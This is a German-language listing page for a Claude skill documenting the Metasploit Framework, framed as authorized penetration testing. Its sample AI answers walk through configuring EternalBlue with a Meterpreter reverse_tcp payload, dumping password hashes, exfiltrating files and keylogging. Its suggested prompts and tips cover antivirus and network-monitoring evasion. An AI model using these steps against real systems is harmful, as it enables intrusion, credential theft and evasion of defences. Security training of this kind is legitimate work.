metasploit-framework
Meistern Sie Metasploit-Penetrationstests mit Claude
Sicherheitsprofis benötigen Expertenleitung für autorisierte Penetrations-Test-Workflows. Dieser Skill bietet umfassende Metasploit-Framework-Dokumentation mit Abdeckung von Exploitation, Payload-Generierung und Post-Exploitation-Aktivitäten mit rechtlichen Best Practices.
Die Skill-ZIP herunterladen
In Claude hochladen
Gehe zu Einstellungen → Fähigkeiten → Skills → Skill hochladen
Einschalten und loslegen
Teste es
Verwendung von "metasploit-framework". Wie starte ich msfconsole und suche nach SMB-Exploits?
Erwartetes Ergebnis:
Um msfconsole zu starten und nach SMB-Exploits zu suchen: Starten Sie die Konsole mit 'msfconsole -q' für den stillen Modus, verwenden Sie dann 'search type:exploit smb', um SMB-bezogene Exploit-Module zu finden. Sie können auch spezifisch mit 'search eternalblue' für den MS17-010 SMB-Schwachstellen-Exploit suchen. Überprüfen Sie Moduldetails mit 'info [Modulname]', bevor Sie auswählen.
Verwendung von "metasploit-framework". Was sind die Schritte, um einen Exploit mit einem Meterpreter-Payload zu konfigurieren und auszuführen?
Erwartetes Ergebnis:
Konfigurieren Sie einen Exploit in sechs Schritten: Verwenden Sie zunächst 'use [Modulpfad]', um den Exploit auszuwählen. Führen Sie 'show options' aus, um die erforderlichen Einstellungen anzuzeigen. Legen Sie Zielparameter mit 'set RHOSTS [Ziel-IP]' und 'set RPORT [Port]' fest. Wählen Sie Ihren Payload mit 'set PAYLOAD windows/x64/meterpreter/reverse_tcp'. Konfigurieren Sie den Listener mit 'set LHOST [Ihre-IP]' und 'set LPORT [Port]'. Führen Sie schließlich 'exploit' aus, um einen Kompromiss zu versuchen und eine Meterpreter-Sitzung herzustellen.
Verwendung von "metasploit-framework". Welche Meterpreter-Befehle sollte ich nach Erhalt einer Sitzung verwenden?
Erwartetes Ergebnis:
Nach dem Herstellen einer Meterpreter-Sitzung führen Sie 'sysinfo' und 'getuid' aus, um Ihre Zugriffsebene zu verstehen. Verwenden Sie 'hashdump', um Passwort-Hashes zu extrahieren, und 'ps', um laufende Prozesse anzuzeigen. Führen Sie 'migrate [PID]' aus, um zu einem stabileren Prozess zu wechseln. Für Daten-Exfiltration verwenden Sie 'download [Datei]' oder 'upload [Datei]'. Führen Sie 'screenshot' aus, um den Desktop zu erfassen, oder 'keyscan_start', um die Tastatureingabe-Protokollierung zu beginnen. Setzen Sie die Sitzung mit 'background' in den Hintergrund, um zu msfconsole zurückzukehren.
Sicherheitsaudit
Mittleres RisikoThis skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
Probleme mit mittlerem Risiko (1)
Probleme mit niedrigem Risiko (3)
Risikofaktoren
⚙️ Externe Befehle (4)
🌐 Netzwerkzugriff (3)
📁 Dateisystemzugriff (1)
Qualitätsbewertung
Was du bauen kannst
Leitung für Penetrations-Test-Workflows
Sicherheitsprofis verwenden diesen Skill während autorisierter Penetrations-Test-Einsätze, um durch die Metasploit-Framework-Funktionen zu navigieren, geeignete Exploit-Module auszuwählen, Payloads zu konfigurieren und Post-Exploitation-Aktivitäten innerhalb des rechtlichen Rahmens durchzuführen.
Dokumentation für Sicherheitsbewertungen
Red-Team-Mitglieder nutzen diesen Skill, um die Metasploit-Nutzung in Sicherheitsbewertungsberichten zu dokumentieren und sicherzustellen, dass korrekte Befehlssyntax, Modulauswahl und Post-Exploitation-Aktivitäten präzise für Kundenergebnisse aufgezeichnet werden.
Bildungsressource für Sicherheitsschulungen
Cybersecurity-Studenten und Zertifizierungskandidaten verwenden diesen Skill, um Metasploit-Framework-Konzepte zu erlernen, Penetrations-Test-Workflows in Laborumgebungen zu üben und sich auf Zertifizierungen wie OSCP, CEH und PTX vorzubereiten.
Probiere diese Prompts
Wie suche ich nach einem geeigneten Metasploit-Exploit-Modul für ein Windows-Ziel mit SMB-Schwachstellen und wähle es aus?
Leiten Sie mich durch die Konfiguration des EternalBlue-Exploits mit einem Meterpreter-reverse_tcp-Payload, einschließlich der Einstellung von RHOSTS, LHOST und erforderlichen Optionen.
Nachdem eine Meterpreter-Sitzung hergestellt wurde, welche Befehle sollte ich verwenden, um das Zielsystem zu enumerieren, Anmeldeinformationen zu extrahieren und Persistenz während eines autorisierten Penetrationstests aufrechtzuerhalten?
Generieren Sie einen msfvenom-Befehl, um einen Windows-Executable-Payload mit umgekehrter TCP-Verbindung zu erstellen, einschließlich Kodierung zur Umgehung der Antivirenerkennung.
Bewährte Verfahren
- Erhalten Sie immer schriftliche Genehmigung, bevor Sie Penetrations-Test-Aktivitäten mit Metasploit durchführen
- Verwenden Sie zuerst den Befehl 'check', um die Ziel-Schwachstelle zu überprüfen, bevor Sie Exploits ausführen, um Störungen zu minimieren
- Testen Sie Payloads in isolierten Laborumgebungen, bevor Sie sie auf Produktions-Bewertungszielen bereitstellen
- Dokumentieren Sie alle Befehle, Ergebnisse und Feststellungen für die Aufnahme in Penetrations-Test-Berichte
- Verwenden Sie wenn möglich verschlüsselte reverse_https-Payloads anstelle von reverse_tcp, um die Netzwerküberwachung zu umgehen
- Setzen Sie Sitzungen in den Hintergrund und migrieren Sie Prozesse sofort, um die Zugriffsstabilität aufrechtzuerhalten
Vermeiden
- Verwenden Sie keine Metasploit-Exploits auf Systemen ohne ausdrückliche schriftliche Genehmigung - dies ist illegal
- Vermeiden Sie es, alle Exploits nacheinander gegen Ziele ohne angemessene Aufklärung und Schwachstellenverifizierung auszuführen
- Verwenden Sie niemals Produktionssysteme oder öffentliche IP-Adressen in Beispielbefehlen während der Dokumentation oder Schulung
- Lassen Sie aktive Meterpreter-Sitzungen nicht unbeaufsichtigt oder vergessen Sie nicht, sie nach Bewertungen ordnungsgemäß zu schließen
- Vermeiden Sie die Verwendung unkodierter Payloads, die von Antivirenprogrammen leicht erkannt werden, ohne vorher Evasion-Techniken zu testen
Häufig gestellte Fragen
Ist die Verwendung des Metasploit-Frameworks legal?
Was ist der Unterschied zwischen msfconsole und msfvenom?
Warum schlagen meine Exploits fehl oder sterben Sitzungen sofort ab?
Was sind die verschiedenen Payload-Typen in Metasploit?
Wie umgehe ich die Antivirenerkennung mit Metasploit-Payloads?
Kann dieser Skill Metasploit-Befehle direkt über Claude oder Claude Code ausführen?
Entwicklerdetails
Autor
sickn33Lizenz
MIT
Repository
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-frameworkRef
main
Dateistruktur
📄 SKILL.md